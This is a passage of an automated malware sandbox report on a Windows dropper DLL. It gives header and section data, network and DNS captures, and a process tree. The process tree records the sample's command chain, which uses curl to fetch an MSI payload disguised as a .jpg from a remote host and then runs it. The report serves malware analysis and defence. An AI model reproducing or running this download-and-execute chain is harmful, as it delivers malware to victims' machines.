              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:13e99671da6907109c536ea4afa01e7a
              Instruction
              dec ebp
              pop edx
              nop
              add byte ptr [ebx], al
              add byte ptr [eax], al
              add byte ptr [eax+eax], al
              add byte ptr [eax], al
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x21c00x4c.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x220c0x28.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000xf8.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x30000x24.pdata
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x20200x38.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x20000x20.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x2660x400False0.5078125zlib compressed data4.3487661880829IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x20000x2960x400False0.349609375data2.642166996048795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .pdata0x30000x240x200False0.068359375data0.3102527413766767IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x40000xf80x200False0.3359375data2.5119620156497993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountry
              RT_MANIFEST0x40600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
              DLLImport
              KERNEL32.dllGetProcAddress, FreeLibrary, LoadLibraryA
              NameOrdinalAddress
              xlAutoOpen10x180001000
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States
              TimestampSource PortDest PortSource IPDest IP
              Nov 30, 2022 00:33:02.696511030 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:02.855293036 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:02.909787893 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:02.909965038 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:02.910645962 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.067636013 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.068957090 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.069293976 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.123477936 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.129914045 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.129986048 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.130033970 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.130078077 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.130129099 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.130168915 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.130212069 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.130208015 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.130208969 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.130254984 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.130269051 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.130299091 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.130342007 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.130352974 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.130393982 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.281018972 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.281299114 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.281344891 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.281388044 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.281435966 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.281450033 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.281502008 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.281553030 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.281565905 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.281620979 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.281681061 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.281687021 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.281744957 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.281795025 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.281804085 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.281857967 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.343219995 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343275070 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343307018 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343337059 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343370914 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343403101 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343435049 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343466997 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343497992 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343532085 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343559980 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343591928 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343592882 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.343625069 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343652010 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.343657017 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343688965 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343710899 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.343725920 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343758106 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343790054 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343821049 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.343823910 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.343853951 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.343856096 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.344103098 CET4969980192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.493837118 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.493906021 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.493963957 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.493979931 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494107962 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494149923 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.494182110 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494208097 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.494227886 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494296074 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.494326115 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494369030 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494398117 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.494441032 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494488955 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494553089 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.494556904 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494602919 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494667053 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.494677067 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494740963 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.494750977 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494801998 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494880915 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.494910002 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.494978905 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.495019913 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.495086908 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.495100975 CET8049700191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.495162010 CET4970080192.168.2.5191.252.51.12
              Nov 30, 2022 00:33:03.556761026 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.556827068 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.556911945 CET8049699191.252.51.12192.168.2.5
              Nov 30, 2022 00:33:03.557002068 CET8049699191.252.51.12192.168.2.5
              TimestampSource PortDest PortSource IPDest IP
              Nov 30, 2022 00:33:02.335405111 CET6084153192.168.2.58.8.8.8
              Nov 30, 2022 00:33:02.448577881 CET6189353192.168.2.58.8.8.8
              Nov 30, 2022 00:33:02.580514908 CET53608418.8.8.8192.168.2.5
              Nov 30, 2022 00:33:02.666970968 CET53618938.8.8.8192.168.2.5
              Nov 30, 2022 00:33:04.852992058 CET6064953192.168.2.58.8.8.8
              Nov 30, 2022 00:33:04.872724056 CET53606498.8.8.8192.168.2.5
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Nov 30, 2022 00:33:02.335405111 CET192.168.2.58.8.8.80x150eStandard query (0)anydesk10.hospedagemdesites.wsA (IP address)IN (0x0001)false
              Nov 30, 2022 00:33:02.448577881 CET192.168.2.58.8.8.80x6b9fStandard query (0)anydesk10.hospedagemdesites.wsA (IP address)IN (0x0001)false
              Nov 30, 2022 00:33:04.852992058 CET192.168.2.58.8.8.80xd0a6Standard query (0)anydesk10.hospedagemdesites.wsA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Nov 30, 2022 00:33:02.580514908 CET8.8.8.8192.168.2.50x150eNo error (0)anydesk10.hospedagemdesites.ws191.252.51.12A (IP address)IN (0x0001)false
              Nov 30, 2022 00:33:02.666970968 CET8.8.8.8192.168.2.50x6b9fNo error (0)anydesk10.hospedagemdesites.ws191.252.51.12A (IP address)IN (0x0001)false
              Nov 30, 2022 00:33:04.872724056 CET8.8.8.8192.168.2.50xd0a6No error (0)anydesk10.hospedagemdesites.ws191.252.51.12A (IP address)IN (0x0001)false
              • anydesk10.hospedagemdesites.ws

              Click to jump to process

              Target ID:0
              Start time:00:33:00
              Start date:30/11/2022
              Path:C:\Windows\System32\loaddll64.exe
              Wow64 process (32bit):false
              Commandline:loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
              Imagebase:0x7ff78be70000
              File size:139776 bytes
              MD5 hash:C676FC0263EDD17D4CE7D644B8F3FCD6
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:1
              Start time:00:33:00
              Start date:30/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7fcd70000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:2
              Start time:00:33:00
              Start date:30/11/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
              Imagebase:0x7ff627730000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:3
              Start time:00:33:00
              Start date:30/11/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
              Imagebase:0x7ff704c50000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:4
              Start time:00:33:00
              Start date:30/11/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
              Imagebase:0x7ff704c50000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:5
              Start time:00:33:01
              Start date:30/11/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
              Imagebase:0x7ff627730000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:6
              Start time:00:33:01
              Start date:30/11/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
              Imagebase:0x7ff627730000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:7
              Start time:00:33:01
              Start date:30/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7fcd70000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:8
              Start time:00:33:01
              Start date:30/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7fcd70000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:9
              Start time:00:33:01
              Start date:30/11/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd /C %temp%\spclwow78x.msi
              Imagebase:0x7ff627730000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:10
              Start time:00:33:01
              Start date:30/11/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd /C %temp%\spclwow78x.msi
              Imagebase:0x7ff627730000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:11
              Start time:00:33:01
              Start date:30/11/2022
              Path:C:\Windows\System32\curl.exe
              Wow64 process (32bit):false
              Commandline:curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
              Imagebase:0x7ff70c580000
              File size:424448 bytes
              MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:12
              Start time:00:33:01
              Start date:30/11/2022
              Path:C:\Windows\System32\curl.exe
              Wow64 process (32bit):false
              Commandline:curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
              Imagebase:0x7ff70c580000
              File size:424448 bytes
              MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:13
              Start time:00:33:02
              Start date:30/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7fcd70000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:14
              Start time:00:33:02
              Start date:30/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7fcd70000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:15
              Start time:00:33:03
              Start date:30/11/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
              Imagebase:0x7ff704c50000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:16
              Start time:00:33:04
              Start date:30/11/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
              Imagebase:0x7ff627730000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:17
              Start time:00:33:04
              Start date:30/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7fcd70000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:18
              Start time:00:33:04
              Start date:30/11/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd /C %temp%\spclwow78x.msi
              Imagebase:0x7ff627730000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:19
              Start time:00:33:04
              Start date:30/11/2022
              Path:C:\Windows\System32\curl.exe
              Wow64 process (32bit):false
              Commandline:curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
              Imagebase:0x7ff70c580000
              File size:424448 bytes
              MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:20
              Start time:00:33:04
              Start date:30/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7fcd70000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              No disassembly